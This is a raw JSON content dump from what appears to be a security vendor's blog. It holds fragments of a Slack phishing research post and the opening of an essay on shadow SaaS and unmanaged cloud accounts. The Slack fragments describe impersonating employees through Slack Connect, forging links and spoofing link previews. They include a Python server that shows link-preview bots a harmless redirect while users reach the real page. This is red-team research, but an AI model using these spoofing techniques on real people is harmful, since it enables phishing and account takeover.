"value":274988,"nodeType":173},{},[],{"data":279768,"content":279771,"nodeType":312},{"target":279769},{"sys":279770},{"id":274993,"type":317,"linkType":318},[],{"data":279773,"content":279774,"nodeType":178},{},[279775],{"data":279776,"marks":279777,"value":275001,"nodeType":173},{},[],{"data":279779,"content":279780,"nodeType":178},{},[279781],{"data":279782,"marks":279783,"value":275008,"nodeType":173},{},[],{"data":279785,"content":279786,"nodeType":235},{},[279787],{"data":279788,"marks":279789,"value":275015,"nodeType":173},{},[],{"data":279791,"content":279792,"nodeType":178},{},[279793],{"data":279794,"marks":279795,"value":275022,"nodeType":173},{},[],{"data":279797,"content":279800,"nodeType":312},{"target":279798},{"sys":279799},{"id":275027,"type":317,"linkType":318},[],{"data":279802,"content":279803,"nodeType":178},{},[279804],{"data":279805,"marks":279806,"value":275035,"nodeType":173},{},[],{"data":279808,"content":279809,"nodeType":235},{},[279810],{"data":279811,"marks":279812,"value":275042,"nodeType":173},{},[],{"data":279814,"content":279815,"nodeType":178},{},[279816],{"data":279817,"marks":279818,"value":275049,"nodeType":173},{},[],{"data":279820,"content":279821,"nodeType":178},{},[279822],{"data":279823,"marks":279824,"value":275056,"nodeType":173},{},[],{"data":279826,"content":279827,"nodeType":178},{},[279828],{"data":279829,"marks":279830,"value":275063,"nodeType":173},{},[],{"data":279832,"content":279835,"nodeType":312},{"target":279833},{"sys":279834},{"id":275068,"type":317,"linkType":318},[],{"data":279837,"content":279840,"nodeType":312},{"target":279838},{"sys":279839},{"id":275074,"type":317,"linkType":318},[],{"data":279842,"content":279843,"nodeType":178},{},[279844],{"data":279845,"marks":279846,"value":275082,"nodeType":173},{},[],{"data":279848,"content":279849,"nodeType":169},{},[279850],{"data":279851,"marks":279852,"value":264835,"nodeType":173},{},[],{"data":279854,"content":279855,"nodeType":178},{},[279856,279859,279863,279866,279870],{"data":279857,"marks":279858,"value":264842,"nodeType":173},{},[],{"data":279860,"marks":279861,"value":264847,"nodeType":173},{},[279862],{"type":194},{"data":279864,"marks":279865,"value":264851,"nodeType":173},{},[],{"data":279867,"marks":279868,"value":264856,"nodeType":173},{},[279869],{"type":194},{"data":279871,"marks":279872,"value":264860,"nodeType":173},{},[],{"data":279874,"content":279875,"nodeType":178},{},[279876],{"data":279877,"marks":279878,"value":264867,"nodeType":173},{},[],{"data":279880,"content":279881,"nodeType":235},{},[279882],{"data":279883,"marks":279884,"value":264874,"nodeType":173},{},[],{"data":279886,"content":279887,"nodeType":178},{},[279888],{"data":279889,"marks":279890,"value":275127,"nodeType":173},{},[],{"data":279892,"content":279893,"nodeType":178},{},[279894],{"data":279895,"marks":279896,"value":275134,"nodeType":173},{},[],{"data":279898,"content":279901,"nodeType":312},{"target":279899},{"sys":279900},{"id":275139,"type":317,"linkType":318},[],{"data":279903,"content":279906,"nodeType":312},{"target":279904},{"sys":279905},{"id":275145,"type":317,"linkType":318},[],{"data":279908,"content":279909,"nodeType":178},{},[279910],{"data":279911,"marks":279912,"value":275153,"nodeType":173},{},[],{"data":279914,"content":279917,"nodeType":312},{"target":279915},{"sys":279916},{"id":275158,"type":317,"linkType":318},[],{"data":279919,"content":279920,"nodeType":235},{},[279921],{"data":279922,"marks":279923,"value":275166,"nodeType":173},{},[],{"data":279925,"content":279926,"nodeType":178},{},[279927],{"data":279928,"marks":279929,"value":275173,"nodeType":173},{},[],{"data":279931,"content":279932,"nodeType":178},{},[279933],{"data":279934,"marks":279935,"value":275180,"nodeType":173},{},[],{"data":279937,"content":279940,"nodeType":312},{"target":279938},{"sys":279939},{"id":275185,"type":317,"linkType":318},[],{"data":279942,"content":279943,"nodeType":178},{},[279944],{"data":279945,"marks":279946,"value":275193,"nodeType":173},{},[],{"data":279948,"content":279949,"nodeType":178},{},[279950],{"data":279951,"marks":279952,"value":264942,"nodeType":173},{},[],{"data":279954,"content":279955,"nodeType":178},{},[279956],{"data":279957,"marks":279958,"value":275206,"nodeType":173},{},[],{"data":279960,"content":279961,"nodeType":178},{},[279962],{"data":279963,"marks":279964,"value":275213,"nodeType":173},{},[],{"data":279966,"content":279967,"nodeType":178},{},[279968],{"data":279969,"marks":279970,"value":275221,"nodeType":173},{},[279971],{"type":13816},{"data":279973,"content":279974,"nodeType":178},{},[279975,279978],{"data":279976,"marks":279977,"value":275228,"nodeType":173},{},[],{"data":279979,"marks":279980,"value":275233,"nodeType":173},{},[279981],{"type":370},{"data":279983,"content":279986,"nodeType":312},{"target":279984},{"sys":279985},{"id":275238,"type":317,"linkType":318},[],{"data":279988,"content":279989,"nodeType":178},{},[279990],{"data":279991,"marks":279992,"value":275246,"nodeType":173},{},[],{"data":279994,"content":279995,"nodeType":178},{},[279996],{"data":279997,"marks":279998,"value":265010,"nodeType":173},{},[],{"data":280000,"content":280003,"nodeType":312},{"target":280001},{"sys":280002},{"id":275257,"type":317,"linkType":318},[],{"data":280005,"content":280008,"nodeType":312},{"target":280006},{"sys":280007},{"id":275263,"type":317,"linkType":318},[],{"data":280010,"content":280011,"nodeType":178},{},[280012],{"data":280013,"marks":280014,"value":275271,"nodeType":173},{},[],{"data":280016,"content":280017,"nodeType":178},{},[280018],{"data":280019,"marks":280020,"value":275278,"nodeType":173},{},[],{"data":280022,"content":280023,"nodeType":235},{},[280024],{"data":280025,"marks":280026,"value":275285,"nodeType":173},{},[],{"data":280028,"content":280029,"nodeType":178},{},[280030],{"data":280031,"marks":280032,"value":275292,"nodeType":173},{},[],{"data":280034,"content":280035,"nodeType":178},{},[280036],{"data":280037,"marks":280038,"value":275299,"nodeType":173},{},[],{"data":280040,"content":280043,"nodeType":312},{"target":280041},{"sys":280042},{"id":275304,"type":317,"linkType":318},[],{"data":280045,"content":280046,"nodeType":178},{},[280047],{"data":280048,"marks":280049,"value":275312,"nodeType":173},{},[],{"data":280051,"content":280054,"nodeType":312},{"target":280052},{"sys":280053},{"id":275317,"type":317,"linkType":318},[],{"data":280056,"content":280057,"nodeType":235},{},[280058],{"data":280059,"marks":280060,"value":275325,"nodeType":173},{},[],{"data":280062,"content":280063,"nodeType":178},{},[280064],{"data":280065,"marks":280066,"value":265056,"nodeType":173},{},[],{"data":280068,"content":280069,"nodeType":178},{},[280070],{"data":280071,"marks":280072,"value":275338,"nodeType":173},{},[],{"data":280074,"content":280077,"nodeType":312},{"target":280075},{"sys":280076},{"id":275343,"type":317,"linkType":318},[],{"data":280079,"content":280080,"nodeType":169},{},[280081],{"data":280082,"marks":280083,"value":15539,"nodeType":173},{},[],{"data":280085,"content":280086,"nodeType":178},{},[280087],{"data":280088,"marks":280089,"value":265089,"nodeType":173},{},[],{"data":280091,"content":280092,"nodeType":250},{},[280093,280102,280111,280120],{"data":280094,"content":280095,"nodeType":254},{},[280096],{"data":280097,"content":280098,"nodeType":178},{},[280099],{"data":280100,"marks":280101,"value":275369,"nodeType":173},{},[],{"data":280103,"content":280104,"nodeType":254},{},[280105],{"data":280106,"content":280107,"nodeType":178},{},[280108],{"data":280109,"marks":280110,"value":265112,"nodeType":173},{},[],{"data":280112,"content":280113,"nodeType":254},{},[280114],{"data":280115,"content":280116,"nodeType":178},{},[280117],{"data":280118,"marks":280119,"value":265122,"nodeType":173},{},[],{"data":280121,"content":280122,"nodeType":254},{},[280123],{"data":280124,"content":280125,"nodeType":178},{},[280126],{"data":280127,"marks":280128,"value":275397,"nodeType":173},{},[],{"data":280130,"content":280131,"nodeType":169},{},[280132],{"data":280133,"marks":280134,"value":40632,"nodeType":173},{},[],{"data":280136,"content":280137,"nodeType":178},{},[280138],{"data":280139,"marks":280140,"value":265145,"nodeType":173},{},[],{"data":280142,"content":280143,"nodeType":178},{},[280144],{"data":280145,"marks":280146,"value":265152,"nodeType":173},{},[],{"data":280148,"content":280149,"nodeType":178},{},[280150],{"data":280151,"marks":280152,"value":275422,"nodeType":173},{},[],{"data":280154,"content":280155,"nodeType":178},{},[280156],{"data":280157,"marks":280158,"value":275429,"nodeType":173},{},[],{"data":280160,"content":280161,"nodeType":178},{},[280162,280165,280173],{"data":280163,"marks":280164,"value":275436,"nodeType":173},{},[],{"data":280166,"content":280169,"nodeType":1698},{"target":280167},{"sys":280168},{"id":264515,"type":317,"linkType":318},[280170],{"data":280171,"marks":280172,"value":274839,"nodeType":173},{},[],{"data":280174,"marks":280175,"value":275448,"nodeType":173},{},[],{"data":280177,"content":280180,"nodeType":312},{"target":280178},{"sys":280179},{"id":209109,"type":317,"linkType":318},[],{"data":280182,"content":280183,"nodeType":178},{},[280184],{"data":280185,"marks":280186,"value":37,"nodeType":173},{},[],{"entries":280188},{"inline":280189,"hyperlink":280190,"block":280195},[],[280191,280193],{"sys":280192,"__typename":1528,"title":268752,"slug":268754},{"id":267879},{"sys":280194,"__typename":1528,"title":265179,"slug":265180},{"id":264515},[280196,280198,280206,280213,280220,280227,280235,280241,280247,280254,280258,280264,280269,280276,280283,280291],{"sys":280197,"__typename":15269,"type":112637,"ctaText":192192,"buttonLabel":192193,"buttonColour":15273,"buttonUrl":118},{"id":169040},{"sys":280199,"__typename":5345,"title":280200,"caption":280201,"layoutMode":118,"file":280202},{"id":274993},"Slack phishing - new invite","Slack connect invite from an external tenant with an attacker chosen user name and organization name",{"url":280203,"width":280204,"height":280205},"https://images.ctfassets.net/y1cdw1ablpvd/32Q5YwPYPpnnwr05cFE9FZ/bf1537dc55dad812c2ef8bd56b1be0da/image5.png",792,211,{"sys":280207,"__typename":5345,"title":280208,"caption":280209,"layoutMode":118,"file":280210},{"id":275027},"Slack phishing - impersonating an employee","An external attacker (the Zuck with an F on the profile to show it's an external account) in a channel impersonating an internal user (the Zuck without an F to show it's an internal account)).",{"url":280211,"width":280212,"height":265197},"https://images.ctfassets.net/y1cdw1ablpvd/15wI2UepFxEhNu5Oniv2Jm/bc3719550be55300a1dc9865a2a5c94c/image13.png",1164,{"sys":280214,"__typename":5345,"title":280215,"caption":280216,"layoutMode":118,"file":280217},{"id":275068},"Slack phishing - spoofing","An initial message from an accepted Slack connect invite, from “Brian” at “SomeExternalMarketingAgency, LLC”",{"url":280218,"width":192182,"height":280219},"https://images.ctfassets.net/y1cdw1ablpvd/1PRhPZ9M8jiyICJV38EldP/c7bccda387c084cd0483ca9a051e1032/image12.png",439,{"sys":280221,"__typename":5345,"title":280222,"caption":280223,"layoutMode":118,"file":280224},{"id":275074},"Slack phishing - social engineering","A social engineering message sent in future with a change in user identity - no new Slack connection is required",{"url":280225,"width":280226,"height":132182},"https://images.ctfassets.net/y1cdw1ablpvd/7D0CEOQmuomsw3uaq7EkNE/5cc635924e8d0ccb72340bbee7aadf78/image8.png",957,{"sys":280228,"__typename":5345,"title":280229,"caption":280230,"layoutMode":118,"file":280231},{"id":275139},"Slack phishing - link forging","Link forging shows the real domain on a hover-over",{"url":280232,"width":280233,"height":280234},"https://images.ctfassets.net/y1cdw1ablpvd/3ZVdrMekiWSULQXFTKcOc3/59d6066d06d3543e7eed79f5d1d4bd61/image2.png",856,140,{"sys":280236,"__typename":5345,"title":280237,"caption":280238,"layoutMode":118,"file":280239},{"id":275145},"Slack phishing - link forging warning","Link forging also presents a warning dialog to the user by default if they click the link",{"url":280240,"width":57817,"height":272719},"https://images.ctfassets.net/y1cdw1ablpvd/1jkGOiQxzDe2xNJCmB8zL3/8babcd4e9ae83bbd79843eaf17596db4/image1.png",{"sys":280242,"__typename":5345,"title":280243,"caption":280244,"layoutMode":118,"file":280245},{"id":275158},"Slack phishing - link forging friendly text","A hover-over still shows the true URL with a friendly text link but no warning dialog is given",{"url":280246,"width":182459,"height":60010},"https://images.ctfassets.net/y1cdw1ablpvd/6pNYmKoOBAvj5Pu0qpB88f/f770190659c1f499d73fffa3fbfce4d3/image9.png",{"sys":280248,"__typename":5345,"title":280249,"caption":280250,"layoutMode":118,"file":280251},{"id":275185},"Slack phishing - link unfurling","Link unfurling resulting in a helpful link preview",{"url":280252,"width":280253,"height":23881},"https://images.ctfassets.net/y1cdw1ablpvd/428xUDjIeEE6rzCyJJWfpe/60b48bf9c36e2831585c1f5c86f97154/image11.png",1276,{"sys":280255,"__typename":134274,"name":280256,"type":170053,"syntax":280257},{"id":275238},"Slack phishing 1: Link preview spoofing code","from http.server import HTTPServer, SimpleHTTPRequestHandler\n\n\nclass MyHandler(SimpleHTTPRequestHandler):\n    def do_GET(self):\n        for header, val in self.headers.items():\n            if header == \"User-Agent\":\n                print(header, val)\n                if val.startswith(\"Slackbot-LinkExpanding\") or \"SkypeUriPreview\" in val or \"Google-PageRenderer\" in val:\n                    self.send_response(301)\n                    self.send_header('Location', 'https://docs.google.com/presentation/d/1JsjD2Ro9KaHmW2vILPKJ6-7ptW89pfsAReyzCxQdpq0/edit?usp=sharing')\n                    self.end_headers()\n                    return\n            print(header, val)\n        return super(MyHandler, self).do_GET()\n\n\nhttpd = HTTPServer(('localhost', 8000), MyHandler)\nhttpd.serve_forever()",{"sys":280259,"__typename":5345,"title":280260,"caption":280261,"layoutMode":118,"file":280262},{"id":275257},"Slack phishing - user and link preview spoofing","Phishing message making use of user spoofing and link preview spoofing to make the link seem legitimate, so the user won’t notice the true URL. A small period is used to hide the URL.",{"url":280263,"width":11861,"height":139943},"https://images.ctfassets.net/y1cdw1ablpvd/2yh3i1Htdy4iXfKfRgiPBj/aa455d9513a6047b187df60494e942d8/image4.png",{"sys":280265,"__typename":5345,"title":280266,"caption":265240,"layoutMode":118,"file":280267},{"id":275263},"Slack phishing - fake phishing page",{"url":280268,"width":265243,"height":29270},"https://images.ctfassets.net/y1cdw1ablpvd/7eN4laU7EvdAbi0mjyLNeK/f8ed7e4db0fe35ebb85ac7a6946c7f05/image6.png",{"sys":280270,"__typename":5345,"title":280271,"caption":280272,"layoutMode":118,"file":280273},{"id":275304},"Slack phishing - link preview from external","Link previews from external messages do not show the image by default, but allow the user to override this",{"url":280274,"width":53530,"height":280275},"https://images.ctfassets.net/y1cdw1ablpvd/3OORVNatftPSxM4d5RUeCX/e88a707d86ac24db370ea7b54a5b5570/image7.png",239,{"sys":280277,"__typename":5345,"title":280278,"caption":280279,"layoutMode":280280,"file":280281},{"id":275317},"Slack phishing - technical diagram 1","A diagram to show the combination of external spoofing and link preview spoofing in action","Breaks margins",{"url":280282,"width":5358,"height":23887},"https://images.ctfassets.net/y1cdw1ablpvd/5F5m59YpByCrIMmm71sal/d6863a45244ebc9821589224d34a3962/image10.png",{"sys":280284,"__typename":5345,"title":280285,"caption":280286,"layoutMode":118,"file":280287},{"id":275343},"Slack phishing - link unfurling edited","An edited message to remove the malicious link and replace it with the same link used for spoofed link preview. ",{"url":280288,"width":280289,"height":280290},"https://images.ctfassets.net/y1cdw1ablpvd/2keEwuruFFUM8tT9AFqEvp/ee2b1d858ed766f5193317c4bb888e3c/image3.png",637,423,{"sys":280292,"__typename":15269,"type":117876,"ctaText":265256,"buttonLabel":265257,"buttonColour":152046,"buttonUrl":118},{"id":209109},"content:blog:slack-phishing-for-initial-access.json","blog/slack-phishing-for-initial-access.json","blog/slack-phishing-for-initial-access",{"_path":280297,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":280298,"ogImage":118,"summary":280300,"title":273619,"subtitle":118,"metaTitle":280321,"synopsis":273620,"hashTags":118,"publishedDate":273621,"slug":273622,"tagsCollection":280322,"relatedBlogPostsCollection":280328,"authorsCollection":282560,"content":282564,"_id":282948,"_type":5439,"_source":5440,"_file":282949,"_stem":282950,"_extension":5439},"/blog/manage-third-party-data-access",{"id":273231,"publishedAt":280299},"2026-01-30T09:31:28.231Z",{"json":280301},{"data":280302,"content":280303,"nodeType":165},{},[280304,280315],{"data":280305,"content":280306,"nodeType":178},{},[280307,280311],{"data":280308,"marks":280309,"value":280310,"nodeType":173},{},[],"Employees are self-adopting SaaS apps and creating new cloud identities without IT approval. ",{"data":280312,"marks":280313,"value":280314,"nodeType":173},{},[],"Consider a solution with built-in features to find and secure identities your employees have created and guide them to harden their accounts against attacks.",{"data":280316,"content":280317,"nodeType":178},{},[280318],{"data":280319,"marks":280320,"value":13836,"nodeType":173},{},[],"Manage third-party data access",{"items":280323},[280324,280326],{"sys":280325,"name":26137},{"id":26136},{"sys":280327,"name":26133},{"id":26132},{"items":280329},[280330,281800],{"__typename":1528,"sys":280331,"content":280333,"title":281786,"synopsis":281787,"hashTags":118,"publishedDate":281788,"slug":281789,"tagsCollection":281790,"authorsCollection":281796},{"id":280332},"3ic4Ok5kwIE8UuUClhPFPn",{"json":280334},{"nodeType":165,"data":280335,"content":280336},{},[280337,280343,280350,280357,280364,280371,280378,280385,280392,280435,280442,280449,280456,280463,280470,280476,280483,280490,280497,280505,280512,280519,280526,280533,280540,280547,280554,280574,280580,280587,280594,280605,280613,280620,280626,280633,280640,280646,280653,280662,280678,280701,280708,280715,280722,280729,280735,280742,280749,280756,280763,280770,280777,280797,280804,280811,280818,280825,280841,280874,280883,280890,280897,280904,280911,280918,280925,280932,280938,280945,280952,280959,280966,280973,280980,281000,281007,281013,281020,281043,281050,281057,281090,281097,281104,281111,281118,281131,281138,281207,281214,281221,281244,281250,281257,281264,281271,281304,281311,281707,281714,281733,281740,281749,281765,281772,281779],{"nodeType":169,"data":280338,"content":280339},{},[280340],{"nodeType":173,"value":258287,"marks":280341,"data":280342},[],{},{"nodeType":178,"data":280344,"content":280345},{},[280346],{"nodeType":173,"value":280347,"marks":280348,"data":280349},"Employees using a new work app used to be the final step of the software-onboarding process. ",[],{},{"nodeType":178,"data":280351,"content":280352},{},[280353],{"nodeType":173,"value":280354,"marks":280355,"data":280356},"Now it's the first. ",[],{},{"nodeType":178,"data":280358,"content":280359},{},[280360],{"nodeType":173,"value":280361,"marks":280362,"data":280363},"SaaS vendors bypass IT and security and hook employees with free apps and trials. This has led to sensitive data on shadow SaaS applications (more on this later) that is accessible via unmanaged cloud accounts (accounts that aren’t protected by SSO or logged into via social login accounts). Attackers exploit this unmonitored attack surface with new takes on old techniques that are going undetected.",[],{},{"nodeType":178,"data":280365,"content":280366},{},[280367],{"nodeType":173,"value":280368,"marks":280369,"data":280370},"Employees self-adopting apps might sound like a security nightmare, but it doesn’t have to be. In fact, it can be a really good thing that enables employees to be more productive and your business to be more competitive. And, frankly, there’s no way to stop it without causing a SaaS sprawl issue. ",[],{},{"nodeType":178,"data":280372,"content":280373},{},[280374],{"nodeType":173,"value":280375,"marks":280376,"data":280377},"What’s clear is that this new landscape has fundamentally changed the way software is brought into the business. The days of security acting as a gatekeeper that all apps must pass through before they can touch live data are over. The market forces driving self-service apps aren’t stopping, so the security industry needs to adapt.",[],{},{"nodeType":178,"data":280379,"content":280380},{},[280381],{"nodeType":173,"value":280382,"marks":280383,"data":280384},"Security teams need to regain visibility and control over company data and how it’s secured. ",[],{},{"nodeType":178,"data":280386,"content":280387},{},[280388],{"nodeType":173,"value":280389,"marks":280390,"data":280391},"In this guide I’ll show security teams: ",[],{},{"nodeType":250,"data":280393,"content":280394},{},[280395,280405,280415,280425],{"nodeType":254,"data":280396,"content":280397},{},[280398],{"nodeType":178,"data":280399,"content":280400},{},[280401],{"nodeType":173,"value":280402,"marks":280403,"data":280404},"What’s driving employee app self-adoption and the impact on security teams",[],{},{"nodeType":254,"data":280406,"content":280407},{},[280408],{"nodeType":178,"data":280409,"content":280410},{},[280411],{"nodeType":173,"value":280412,"marks":280413,"data":280414},"Why the go-to solutions of policies and tools that block access to unsanctioned apps don’t work",[],{},{"nodeType":254,"data":280416,"content":280417},{},[280418],{"nodeType":178,"data":280419,"content":280420},{},[280421],{"nodeType":173,"value":280422,"marks":280423,"data":280424},"What new approaches can work and how to apply them",[],{},{"nodeType":254,"data":280426,"content":280427},{},[280428],{"nodeType":178,"data":280429,"content":280430},{},[280431],{"nodeType":173,"value":280432,"marks":280433,"data":280434},"The two aspects to address when securing SaaS and managing risk ",[],{},{"nodeType":178,"data":280436,"content":280437},{},[280438],{"nodeType":173,"value":280439,"marks":280440,"data":280441},"At the end of this book, we’ll link to a guide filled with practical guidance on how to manage those risks and quickly reduce your risk exposure. In that guide, we’ll also cover which data sources are available for SaaS security and why the choice is crucial.",[],{},{"nodeType":178,"data":280443,"content":280444},{},[280445],{"nodeType":173,"value":280446,"marks":280447,"data":280448},"The guidance provided here has been developed after talking with security leaders and CISOs that are already successfully embracing SaaS self-adoption while keeping a handle on risks. There are too many folks here to thank personally, but if you recognize some of this from our discussions, please accept my thanks, and hopefully there’s something new and useful here for you as well!",[],{},{"nodeType":169,"data":280450,"content":280451},{},[280452],{"nodeType":173,"value":280453,"marks":280454,"data":280455},"Why is it so easy for employees to self-adopt new apps without IT?",[],{},{"nodeType":235,"data":280457,"content":280458},{},[280459],{"nodeType":173,"value":280460,"marks":280461,"data":280462},"Memories of a simpler time",[],{},{"nodeType":178,"data":280464,"content":280465},{},[280466],{"nodeType":173,"value":280467,"marks":280468,"data":280469},"Before cloud computing was a thing, IT teams procured and managed hardware, software, networks and services for their businesses. The business was dependent on IT deploying new software across their on-prem network and managing it, so it was nearly impossible to bypass them. They became, in effect, the gatekeepers to the business’ IT environment. The onboarding process typically looked something like this:",[],{},{"nodeType":312,"data":280471,"content":280475},{"target":280472},{"sys":280473},{"id":280474,"type":317,"linkType":318},"1Dw4V0Fd0wI8yB6juzyWjg",[],{"nodeType":178,"data":280477,"content":280478},{},[280479],{"nodeType":173,"value":280480,"marks":280481,"data":280482},"IT asked Security to review a new app and its vendor to identify risks and determine if it should be adopted. At this point, security would specify which controls were required for it to be used securely. This all happened  before an app touched their network and interacted with any live data.",[],{},{"nodeType":178,"data":280484,"content":280485},{},[280486],{"nodeType":173,"value":280487,"marks":280488,"data":280489},"In return, Security could rely on IT to give them accurate information about all the businesses’ technology assets that needed to be protected. This process gave both teams great visibility across their total IT environment. Security and IT could maintain a high degree of control over how technology was used. ",[],{},{"nodeType":178,"data":280491,"content":280492},{},[280493],{"nodeType":173,"value":280494,"marks":280495,"data":280496},"In other words, life was wonderful and no one ever got hacked (maybe, it’s hard to remember now). Then the cloud happened and ruined everything.",[],{},{"nodeType":178,"data":280498,"content":280499},{},[280500],{"nodeType":173,"value":280501,"marks":280502,"data":280504},"Clearly I’m joking, but while very few orgs got it perfect, it was “good enough” at providing process-driven visibility of what enterprise software was being deployed for most.",[280503],{"type":1646},{},{"nodeType":235,"data":280506,"content":280507},{},[280508],{"nodeType":173,"value":280509,"marks":280510,"data":280511},"The birth of the “as-a-Service” era",[],{},{"nodeType":178,"data":280513,"content":280514},{},[280515],{"nodeType":173,"value":280516,"marks":280517,"data":280518},"I jest, the cloud hasn’t ruined everything. It gave organizations the opportunity to be faster, more flexible and more efficient. Businesses no longer had to buy and manage all their own infrastructure and apps, they could just pay for what they used when they needed it. It led to a wave of “as-a-service” business models that stretched across infrastructure, platforms and software. ",[],{},{"nodeType":178,"data":280520,"content":280521},{},[280522],{"nodeType":173,"value":280523,"marks":280524,"data":280525},"Thousands of new software-as-a-service (SaaS) companies emerged with high quality apps that were easy to use over the internet. Essentially SaaS created software employees could use on-demand, which was a huge departure from the old days when IT and Security would do loads of security vetting upfront because they knew they’d be stuck with the software for years after deploying.",[],{},{"nodeType":178,"data":280527,"content":280528},{},[280529],{"nodeType":173,"value":280530,"marks":280531,"data":280532},"Leveraging great on-demand software tools boosted employee productivity and made their businesses more competitive. Tech-savvy employees, used to subscribing to on-demand software services in their personal lives, started to demand more autonomy over the technology they use at work. They were no longer satisfied with the generic suite of programs that IT could provide for them. Instead, they wanted the specialist tools designed and built for people like them by people like them. ",[],{},{"nodeType":178,"data":280534,"content":280535},{},[280536],{"nodeType":173,"value":280537,"marks":280538,"data":280539},"Despite users loving the software once they tried it, SaaS vendors were struggling to sell into large organizations with complicated procurement processes - it was too difficult to get their software in user's hands, and got more difficult the more niche and specialized the app was.",[],{},{"nodeType":235,"data":280541,"content":280542},{},[280543],{"nodeType":173,"value":280544,"marks":280545,"data":280546},"The rise of Product-Led Growth",[],{},{"nodeType":178,"data":280548,"content":280549},{},[280550],{"nodeType":173,"value":280551,"marks":280552,"data":280553},"Enter Wes Bush, a young SaaS marketer who published his book Product Led Growth in 2019. In it, he showed SaaS vendors how they can increase their sales revenues while reducing their sales cycles and costs by using their products as their primary go-to-market vehicle, as opposed to traditional sales teams. ",[],{},{"nodeType":178,"data":280555,"content":280556},{},[280557,280561,280570],{"nodeType":173,"value":280558,"marks":280559,"data":280560},"The premise is simple; prospective customers prefer to experience the value of a product rather than be told about it by sales people. Back in 2015 Forrester ",[],{},{"nodeType":186,"data":280562,"content":280564},{"uri":280563},"https://www.forrester.com/blogs/15-04-14-death_of_a_b2b_salesman/",[280565],{"nodeType":173,"value":280566,"marks":280567,"data":280569},"reported",[280568],{"type":194},{},{"nodeType":173,"value":280571,"marks":280572,"data":280573}," that 75% of B2B buyers prefer a sales-rep-free buying process. The book became a phenomenon within the SaaS industry. Product-led growth (PLG) is now the norm for SaaS companies, and around 60% of SaaS companies now use PLG and that’s only going to increase.",[],{},{"nodeType":312,"data":280575,"content":280579},{"target":280576},{"sys":280577},{"id":280578,"type":317,"linkType":318},"747PuaJ26IbolPB1ugxd2h",[],{"nodeType":178,"data":280581,"content":280582},{},[280583],{"nodeType":173,"value":280584,"marks":280585,"data":280586},"Why is PLG turning software adoption on its head? In order to establish a PLG go-to-market motion, SaaS vendors need end users to try their product, either as a free trial or a free version of the app, and quickly experience value from it so  they’re motivated to champion the internal business case through to a successful purchase. ",[],{},{"nodeType":178,"data":280588,"content":280589},{},[280590],{"nodeType":173,"value":280591,"marks":280592,"data":280593},"PLG not only relies upon end users as the initial adopters of a new app, but for them to experience meaningful value during that initial experience. This nearly always necessitates that the new app interacts with real data in a live environment. What’s more, it’s only the apps that end users want to use in a paid tier that are likely to ever get submitted to the app-onboarding process. The freemium and trial versions of apps that are just tried out are unlikely to ever be presented to IT and security. ",[],{},{"nodeType":178,"data":280595,"content":280596},{},[280597,280601],{"nodeType":173,"value":280598,"marks":280599,"data":280600},"This obviously poses a problem from an IT and security standpoint.",[],{},{"nodeType":173,"value":3107,"marks":280602,"data":280604},[280603],{"type":370},{},{"nodeType":178,"data":280606,"content":280607},{},[280608],{"nodeType":173,"value":280609,"marks":280610,"data":280612},"SaaS vendors are deliberately bypassing the traditional software procurement processes that used to give IT and security teams visibility of the third party apps that had their data. ",[280611],{"type":370},{},{"nodeType":178,"data":280614,"content":280615},{},[280616],{"nodeType":173,"value":280617,"marks":280618,"data":280619},"Instead, SaaS vendors are directly targeting employees with their apps and encouraging them to plug them straight into live environments before they’ve been vetted. Software onboarding now looks a lot more like this:",[],{},{"nodeType":312,"data":280621,"content":280625},{"target":280622},{"sys":280623},{"id":280624,"type":317,"linkType":318},"61Oj6GzX4amLxEJ5fPDJCq",[],{"nodeType":235,"data":280627,"content":280628},{},[280629],{"nodeType":173,"value":280630,"marks":280631,"data":280632},"IT and security teams might be the last to know about PLG and miss the scale of the change",[],{},{"nodeType":178,"data":280634,"content":280635},{},[280636],{"nodeType":173,"value":280637,"marks":280638,"data":280639},"IT & security folks are usually ahead of the curve when it comes to technology shifts, but in this case many might have missed the scale or speed of the change. That’s because IT and security tools are among the least product-led of any sector. Most of our industry’s tools require heavy integrations, complicated setup, agent deployments, and so on. ",[],{},{"nodeType":312,"data":280641,"content":280645},{"target":280642},{"sys":280643},{"id":280644,"type":317,"linkType":318},"2ldVELsUQIU0xaPSPJyXBR",[],{"nodeType":178,"data":280647,"content":280648},{},[280649],{"nodeType":173,"value":280650,"marks":280651,"data":280652},"Unfortunately, few security companies are making products as easy to set up and use as new tools for marketing, sales, finance, development, engineering design, legal, HR, and basically every other sector that can’t rely on a technical first user. ",[],{},{"nodeType":178,"data":280654,"content":280655},{},[280656],{"nodeType":173,"value":280657,"marks":280658,"data":280661},"This leads to a misconception in IT and Security teams that self-adopted apps are fringe and don’t contain significant sensitive data.",[280659,280660],{"type":1646},{"type":370},{},{"nodeType":178,"data":280663,"content":280664},{},[280665,280669,280674],{"nodeType":173,"value":280666,"marks":280667,"data":280668},"Most concerning for security teams is that ",[],{},{"nodeType":173,"value":280670,"marks":280671,"data":280673},"the sheer number of apps in use has increased dramatically",[280672],{"type":370},{},{"nodeType":173,"value":280675,"marks":280676,"data":280677}," and will continue to do so. There are a couple reasons for this: ",[],{},{"nodeType":246189,"data":280679,"content":280680},{},[280681,280691],{"nodeType":254,"data":280682,"content":280683},{},[280684],{"nodeType":178,"data":280685,"content":280686},{},[280687],{"nodeType":173,"value":280688,"marks":280689,"data":280690},"The big old monolithic on-prem software is being replaced not by a single SaaS app, but an ecosystem of specialized apps. Each new app integrates and extends the functionality as the team using the stack learns what they need, so there is a one-to-many shift happening. ",[],{},{"nodeType":254,"data":280692,"content":280693},{},[280694],{"nodeType":178,"data":280695,"content":280696},{},[280697],{"nodeType":173,"value":280698,"marks":280699,"data":280700},"Since apps are virtually zero-maintenance these days, the operating cost (if not the licensing cost) of running multiple apps is almost the same as one (compared to on-prem apps), so duplicate apps are far less of a problem. This also makes them pretty common and further multiplies the number of apps and vendors.",[],{},{"nodeType":169,"data":280702,"content":280703},{},[280704],{"nodeType":173,"value":280705,"marks":280706,"data":280707},"The impact of self-adoption on security",[],{},{"nodeType":235,"data":280709,"content":280710},{},[280711],{"nodeType":173,"value":280712,"marks":280713,"data":280714},"Loss of visibility",[],{},{"nodeType":178,"data":280716,"content":280717},{},[280718],{"nodeType":173,"value":280719,"marks":280720,"data":280721},"We’ve seen how SaaS vendors' move to PLG has led to greater employee self-adoption of work apps that don’t require IT or Security to be involved. The direct consequence of this is that Security teams have lost process-driven visibility of their company’s SaaS estate. This problem is often called “Shadow SaaS.” It is also the first problem to solve -  the old adage “you can’t secure what you don’t know about” is as true in the SaaS world as it is in any other security 